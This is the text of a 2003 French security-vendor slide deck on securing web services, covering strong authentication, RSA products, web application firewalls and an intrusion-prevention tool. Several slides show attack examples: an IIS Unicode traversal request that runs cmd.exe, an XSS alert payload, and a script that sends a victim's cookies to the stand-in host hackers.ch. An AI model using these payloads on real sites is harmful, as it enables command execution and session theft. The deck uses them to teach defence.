  • 28. Vol d’un mot de passe d’une session SSL (SSL Hijacking) 1) ARP Spoofé 172.20.1.14 DNS Spoofé Serveur DNS 2) DNS Spoofé IP de Fantasio? 172.20.1.14 172.20.1.253 Spoof la Trafic SSL déchiffré Fantasio Serveur Web réponse 172.20.1.253 3 bis) Certificat du serveur Fantasio Spoofé 3) SSL Interrompu  Solutions à la clef
  • 29. La simplicité et la sécurité sans compromis: le certificat client  SSL Autorité de certification Internet ou externe Token USB Validation des certificats Smarcard PKCS#12 CRL OCSP VSCP Challenge (nonce) + Réponse  Solutions à la clef
  • 30. e-Xpert Solutions SA | 29, route de Pré-Marais | CH 1233 Bernex-Genève | Tél +41 22 727 05 55 | Fax +41 22 727 05 50 Etude de cas MKS Finance Application bancaire / certificats clients SSL  info@e-xpertsolutions.com | www.e-xpertsolutions.com
  • 31. Etude de cas: sécurisation d’une application bancaire  Authentification forte basée sur les certificats clients  Utilisation d’un reverse proxy SSL  E-Xpert Gate (PKI Ready: OCSP, filtrage des certificats,etc.)  Application basée sur une architecture J2EE  Environ 300 clients  Génération des certificats clients « In House »  Sécurité accrue et optimisation des coûts  Distribution des certificats dans leur container software  PKCS#11  Evolution possible vers la signature des transactions  Non-répudiation  Solutions à la clef
  • 32. Architecture de sécurité basée sur la solution e-Xpert Gate Domino Server Web BEA BEA WebLogic e-Xpert Gate Applet Java Container PKI Ready HTTPS HTTP Reverse Proxy PKCS#12 Authentification SSL Validation des certificats CA et VA OS Sécurisé SSH RA Support PKCS#11 etc. Validation Online Certificat délivré DB des Certificats par la PKI interne Via OCSP Cobol  Solutions à la clef
  • 33. La référence: l’authentification forte SecurID  Solution très portable  Pas besoin d’installer du hardware  Convient parfaitement aux nomades (Internet Café, Hôtel)  Niveau de sécurité très élevé  Système simple à l’utilisation  Pas de clavier  De facto Standard  Environ 300 agents SecurID  Agents pour les applications Web  Solutions à la clef
  • 34. Identification forte des utilisateurs Web avec SecurID  Serveurs Web  IIS  Apache et reverse proxy  Stronghold  SUN One Server  Domino  Application server  BEA WebLogic, IBM WebSphere  Via Cleartrust  Solutions à la clef
  • 35. e-Xpert Solutions SA | 29, route de Pré-Marais | CH 1233 Bernex-Genève | Tél +41 22 727 05 55 | Fax +41 22 727 05 50 Etude de cas NFuse Citrix et SecurID  info@e-xpertsolutions.com | www.e-xpertsolutions.com
  • 36. Etude de cas: sécurisation de Citrix NFuse avec RSA SecurID Ace Server SecurID Citrix Web Server Nfuse Secure Gateway  Solutions à la clef
  • 37. e-Xpert Solutions SA | 29, route de Pré-Marais | CH 1233 Bernex-Genève | Tél +41 22 727 05 55 | Fax +41 22 727 05 50 Le système d’authentification mobile La gestion des identités Par Hervé Ottet, RSA Security La sécurité de « pointe »  info@e-xpertsolutions.com | www.e-xpertsolutions.com
  • 38. RSA Mobile and RSA ClearTrust La Sécurité des services Web, 11 Mars 2003 Hervé Ottet, Pre-Sale Engineer, hottet@rsasecurity.com
  • 39. Why Focus on Authentication? • Authentication is the essential foundation for trusted business process — Establishes trust by proving identities of the participants in a transaction • Authentication is the foundation for other critical services — Personalization — Authorization / Access Management — Identity Management Business policy: liability, assurance for transactions Applications and services: access control and authorization — Audit Presentation / Personalization: what the user sees Authenticated Identity (user, device, application, group, organization) Defining relationships through quality of experience Relationships between identities and information Relationships between people, groups, and organizations
  • 41. Introducing RSA Mobile • Upon receiving a valid username and PIN, RSA Mobile sends a one-time access code to the user's portable device. • Two-factor authentication for Web Application • Leverages a device the user already has • Zero-deployment, zero-footprint • Intuitive, easy to use and highly portable
  • 42. How RSA Mobile works Web Server Agent Userid + PIN Userid + PIN Start here RSA Mobile Authentication Userid + PIN Server Access code + Phone # Access code 294836 e-Mail Server or Gateway Server Telco Network Access code Access code 294836 294836 Text Message
  • 44. RSA Mobile: Security • Built on RSA Security’s patented time-synchronous methodology — Proven security — 13 million end users • In the GSM Network, the access code is sent encrypted with A5 • Access code must be entered on the same instance of the Web browser from which the code was requested — Prevents the use of intercepted access codes • User account can be automatically disabled after an administrator configurable number of bad PINs or bad access code attempts.
  • 45. RSA Mobile Key Features • Protects Web resources through admin-defined authentication policies — RSA Mobile or LDAP passwords — RSA SecurID (proxy to RSA ACE/Server) — ―OR‖ combinations of the above • Flexible integration options — Web filters to protect resources (IIS, Apache, ISA, Apache proxy) — Authentication APIs and Administrative APIs — Can configure PIN-less installation (Users enter tokencode only, no PIN) • High performance / availability — Built on BEA WebLogic application server — Support SAML • RSA Mobile plug-ins facilitate easy integration to the Telco infrastructure — Ships with support for • Wireless modem, E-mail, directly to Telco via SMPP — Additional plug-ins can be easily built
  • 47. Market Drivers • Increased need for managing trust and security over the Web (customer, supplier, resellers) • Reduce burdensome and costly user administration • Provide greater ease of use via Web SSO for customers • Reduce complexity of managing security across heterogeneous IT environments • Desire to support different authentication methods • Real-time transactional authorization will be required as more complex e-business services move to the Web
  • 48. Problem How do you manage the identities of a growing number of users… and their secure access to enterprise Web resources in a scalable, cost- efficient manner …. Customers Partners Employees Access Channels: Intranet, Extranet, Portal, Wireless “Silo” “Silo” “Silo” “Silo” “Silo” Access Access Access Access Access Mgmt. Mgmt. Mgmt. Mgmt. Mgmt. RSA Online SecurCare Siebel PRC mySAP Online
  • 49. Problem …across a heterogeneous IT infrastructure? Portal Web Content Databases Servers Servers Application Management Directories Servers Enterprise Apps
  • 50. Solution Customers Partners Employees Access Channels: Intranet, Extranet, Portal, Wireless Web Access Management Solution RSA Online SecurCare Siebel PRC mySAP Online
  • 52. RSA Cleartrust Architecture Entitlements Entitlements database directory Entitlements Administration Server console Authorization Load server Balancing & replication Authentication agents Web Web Web … Web Server 3 .. Server 2 Server 1 Server n Encrypted Session Cookie End user
  • 53. Authorization ―What can you access?‖ • Web server — Resource – identified by Universal Resource Indicator (URI) — Web pages, CGI files, directories, GIF, JPG files etc. — Application – group of resources • Application server — Additional resources - EJBs, JSPs, Java servlets • Method-level protection – ACCESS, GET, POST • Risk mitigation with fine-grained protection of your existing web-based resources
  • 54. Multiple Authentication Options Offers flexibility and choice • Continue to offer customers broadest choice of authentication methods • Out-of-box support for: — Passwords — RSA SecurID tokens — X.509 certificates Password — Basic (LDAP) — Forms-based authentication • Authentication chaining available via and/or statements • Custom WAX support for: — Biometrics — RSA Mobile — .NET Passport
  • 55. Smart Rules • Apply access rules based on dynamic user properties • Based on flexible business rules and comparison logic • Decrease time to market and increase security
  • 56. Flexibility RSA ClearTrust APIs • Administrative API (Java, C, DCOM) — Create/update user accounts and set authorization rules • Runtime API (Java, C, DCOM) — Provide authentication and authorization services for applications not covered by RSA ClearTrust • WebAgent extension (WAX - C only) — Allows extension and customization of existing Web server plug-in • Leverage existing IT investments though effective systems integration
  • 57. A Comprehensive Solution Identify Manage/ Ensure Ensure Users and Personalize Integrity of Integrity of Devices Access Information Transactions Identity Application Provisioning Integration Mobile Management Services Partners • World-class organization • Largest, fastest growing partner program • Full range of services • Channel partners • Global, 24/7 customer support • Strategic C/SI relationship Information and People and Devices Transactions
  • 59. Pause: 20 minutes  Solutions à la clef
  • 60. e-Xpert Solutions SA | 29, route de Pré-Marais | CH 1233 Bernex-Genève | Tél +41 22 727 05 55 | Fax +41 22 727 05 50 La sécurité des services Web Votre firewall, votre meilleur ennemi La sécurité de « pointe » (Partie II) par Sylvain Maret 11 mars 2003  info@e-xpertsolutions.com | www.e-xpertsolutions.com
  • 61. Pourquoi la sécurité « classique » n’est plus suffisante ?  Les applications Web sont vulnérables  Env. 80% des applications testées (FoundStone)  Les développeurs ne sont pas encore sensibilisés à la sécurité informatique  Encore trop d’erreurs  Les hackers se focalisent sur les applications Web  Votre firewall classique est impuissant pour prévenir les intrusions applicatives  Vos sondes IDS peuvent « éventuellement » détecter une attaque !  Solutions à la clef
  • 62. Votre firewall – votre meilleur ennemi http / https XML, Soap, WSDL .NET Java, ActiveX, VBScript, etc. Html, Dhtml * Pour les flux HTTP votre firewall =  Solutions à la clef * Firewall Classique filtrage niveau 3
  • 63. Les différentes attaques des applications Web Serveur Web App. Web DB Application Server XML Client Web HTTP / HTTPS Apache RMI Port 80 / 443 IIS SQL IIOP Iplanet XML XML Zeus JDBC XML, Soap, HTML, Soap Etc. etc. etc. etc. CGI, PHP Etc. DB •Cross Site •Vol de session •Interprétation des URLs •Mauvais contrôle •Injection de Scripting •MiM http •Mauvaise configuration des entrées code SQL •Code mobile •MiM SSL •BoF utilisateur •Dénis de •Sniffing •Unicode •Méta caractères service •Direct OS Command •BoF •Etc. •Etc. •Etc.  Solutions à la clef
  • 64. Interprétation des URLs http://fantasio.e-xpertsolutions.com:80/chemin/application.asp?a=toto&b=1234 DB Application Server XML HTTP Apache RMI Port 80 IIS SQL IIOP Iplanet XML XML Zeus JDBC XML, Soap, HTML, Soap Etc. etc. etc. etc. CGI, PHP Etc. Serveur Web App. Web DB Client Web Firewall Classique  Solutions à la clef
  • 65. Illustration avec IIS Unicode Exploit  Ancienne vulnérabilité du serveur IIS  Exemple pédagogique  Permet d’exécuter des commandes sur le serveur IIS  Utilise les URL malformés pour « passer les commandes »  « Dot Dot »  Unicode  Solutions à la clef
  • 66. e-Xpert Solutions SA | 29, route de Pré-Marais | CH 1233 Bernex-Genève | Tél +41 22 727 05 55 | Fax +41 22 727 05 50 Démonstration par la pratique IIS Unicode Exploit  info@e-xpertsolutions.com | www.e-xpertsolutions.com
  • 67. Interprétation de commandes par les URLs Fantasio Serveur Web GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir  Solutions à la clef
  • 68. Reverse Proxy: firewall applicatif Web  Filtrage des URLs en temps réel  Se base sur une définition précise des URLs  Inclusive  Exclusive 1 GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir 2 GET /scripts/demo/taxes.asp?a=12&b=toto  Solutions à la clef
  • 69. e-Xpert Gate: le firewall applicatif Web Filtrage des URL http, https HTTP Apache Mod_Rewrite Application Web Mod_SSl PKI Support SecurID Support Radius Support HSM Mutli Site OS sécurisé GUI via SSL SSH FIA  Solutions à la clef
  • 70. e-Xpert Solutions SA | 29, route de Pré-Marais | CH 1233 Bernex-Genève | Tél +41 22 727 05 55 | Fax +41 22 727 05 50 Démonstration par la pratique e-Xpert Gate: firewall applicatif Web  info@e-xpertsolutions.com | www.e-xpertsolutions.com
  • 71. e-Xpert Gate: blocage de l’attaque Unicode http, https HTTP Application Web GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir  Solutions à la clef
  • 72. Contrôle des données utilisateurs  La plupart des applications ne contrôlent pas les « Input »  Seulement un contrôle au niveau du client (navigateur) !  Les attaques possibles  Insertion de code, XSS  BoF (pas de contrôle de taille)  exécution de code malicieux  Dépassement des quotas (transaction financière)  Caractères dangereux:  !@$%^&*()-_+`~|[]{};:'quot;?/,.><  Solutions à la clef
  • 73. Illustration avec le Cross-Site Scripting (XSS)  Principe de l’attaque  Attaquer les utilisateurs de l’application plutôt que l’application elle-même  L’attaquant peut provoquer l’envoi à la victime par le site Web légitime d’une page hostile contenant des scripts ou des composants malveillants  Cette page est exécutée sur le poste de la victime dans le contexte du site Web d’origine <A HREF=http://www.mabanque.com/<script> alert(‘Malicious code’)</script>quot;>Click Here</a>  Solutions à la clef
  • 74. Exemple: vol d’un cookie <script> document.location=‘http://hackers.ch/cgi/cookie?’+document.cookie </script> Envoie du cookie vers le site hackers.ch  Solutions à la clef
  • 75. Exemple: Vol de session par XSS Hacker Application Web Login avec le cookie volé 5 4 2 3 1 Lien hostile Application utilisateur Web CGI Script Mail, Page Web Exécution de code hostile  Solutions à la clef
  • 76. e-Xpert Solutions SA | 29, route de Pré-Marais | CH 1233 Bernex-Genève | Tél +41 22 727 05 55 | Fax +41 22 727 05 50 Démonstration par la pratique Attaque XSS  info@e-xpertsolutions.com | www.e-xpertsolutions.com
  • 77. Attaque XSS Injection code hostile http, https Code Hostile Application Web Code exécuté sur le poste client  Solutions à la clef
  • 78. Recommandations: contrôles des données utilisateurs  Accepter que les données autorisées !  Recommandations pour les développeurs  Ne pas faire confiance au client (navigateur)  Comptage du nombre de paramètres  Contrôle du type de données  Contrôle de la longueur  Etc.  Pour plus d’informations  http://www.owasp.org  Solutions à la clef
  • 79. La tendance des firewalls applicatifs Web  Mode d’apprentissage automatique  Contrôle des paramètres  Contrôle des attaques de « brute force »  Blocage de XSS  Contrôle des cookies  Architecture  Mode Reverse Proxy  Agent sur le serveur Web  Solutions à la clef
  • 80. Les enjeux du futur: les services Web  Nouveaux modèles  Notion de services Web  J2EE - .NET  Contrôle des messages Soap / XML  Nouveaux standards  XML Encryption  XML Signature  Nouveaux types d’outils de sécurité  Firewall XML  PKI  Solutions à la clef
  • 81. Audit des applications Web  Outils spécialisés pour auditer les applications Web  Recommandation  Réaliser régulièrement des tests d’intrusions  Plus particulièrement avant la mise en production  Solutions à la clef
  • 82. e-Xpert Solutions SA | 29, route de Pré-Marais | CH 1233 Bernex-Genève | Tél +41 22 727 05 55 | Fax +41 22 727 05 50 Présentation et démonstration Entercept La sécurité de « pointe » 11 mars 2003  info@e-xpertsolutions.com | www.e-xpertsolutions.com
  • 83. Entercept: prévention des intrusions  Outil de la famille des « IPS »  Intrusion Prevention System  Détecte et bloque les intrusions  Sécurisation des plates-formes sensibles  Services frontaux - DMZ  Services sensibles internes à l’entreprise  Sécurisation des serveurs Web  Applications Web  Extranet, Intranet  Solutions à la clef
  • 84. Objectif du produit  Garantir l’intégrité des systèmes  Stopper les attaques (OS et applications)  Protection des attaques connues et inconnues  « Blinder » la machine  Protection des BoF (60% attaques*)  Faciliter le déploiement et l’administration  Minimiser les ressources IT  Eliminer le « Know How » très spécifique  Produit simple à mettre en oeuvre  Permet une latence dans la mise en œuvre des patchs  Solutions à la clef * Source: CERT 2003
  • 85. Entercept: la protection efficace de vos ressources  Blocage des comportements anormaux  Protection contre les BoF  Méthode patentée  Escalade de privilège  Protection des ressources  Fichiers critiques  Fichiers de configuration  Registry (si Windows)  Protection contre l’installation de programmes malicieux  Root Kit  Back Door  Etc.  Solutions à la clef
  • 86. Concept des « System Call » Program Program Program A B C fopen System Call unlink Table rndir User Mode Kernel Mode OS Kernel Network Disk Other Driver Driver Drivers  Solutions à la clef
  • 87. Concept des « System Call » avec Entercept Program Program Program A B C fopen System Call unlink Table rndir User Mode Kernel Mode OS Kernel Network Disk Other Driver Driver Drivers  Solutions à la clef
  • 88. Entercept: firewall applicatif HHTP Serveur Web Décodage http Moteur http FluxHTTP HTTP Prévention des intrusions  Solutions à la clef
  • 89. Mode d’apprentissage Warning Protection Vault Mode Mode Mode Increasing Security  Solutions à la clef
  • 90. Architecture Entercept Notification Reporting Management Serveur NT Serveur WEB Serveur Unix et 2000  Solutions à la clef
  • 91. Gamme de produits  Entercept Standard Edition  Entercept Database Edition  Windows NT  SQL Server 2000  Windows 2000  Solaris 6, 7 et 8  Entercept Web Edition  Apache  Console de gestion Entercept  IIS 4 et 5  NT 4  iPlanet  Windows 2000  Netscape Entreprise Server  Solutions à la clef
  • 92. Road Map Entercept 2003  Version 3.0 disponible courant 2003  Modèle 3 tiers  Gestion par rôles des administrateur  Création de signatures d’attaques  Personnalisation des rapports  Nouveaux agents  HPUX 11, Solaris 9, and Apache 2, linux , Aix  Web Services: Soap XML  Serveur de messagerie  Solutions à la clef
  • 93. Entercept’s Awards et partenaires stratégiques  Solutions à la clef
  • 94. e-Xpert Solutions SA | 29, route de Pré-Marais | CH 1233 Bernex-Genève | Tél +41 22 727 05 55 | Fax +41 22 727 05 50 Démonstration Back Door  info@e-xpertsolutions.com | www.e-xpertsolutions.com
  • 95. Démonstration Entercept Management Entercept You have been Hacked Hacker Script Kidies Intrusion Agent Intercept pour Web  Solutions à la clef
  • 96. Conclusion  Malgré les mesures de sécurité « classiques » les applications Web restent vulnérables  Quelles solutions ?  Authentification forte  Gestion des privilèges  Les firewalls applicatifs Web  L’analyse comportementale  Ou ?  La formation des développeurs  Solutions à la clef
  • 97. Démonstration Entercept  Solutions à la clef
  • 98. Merci pour votre attention  Solutions à la clef
  • 99. Sécurisation des services Web: les produits  RSA Security  Entercept  e-Xpert Gate  NCipher  SSH Communications  Appliance IBM  Tripwire  Aladdin  F5 Networks  Solutions à la clef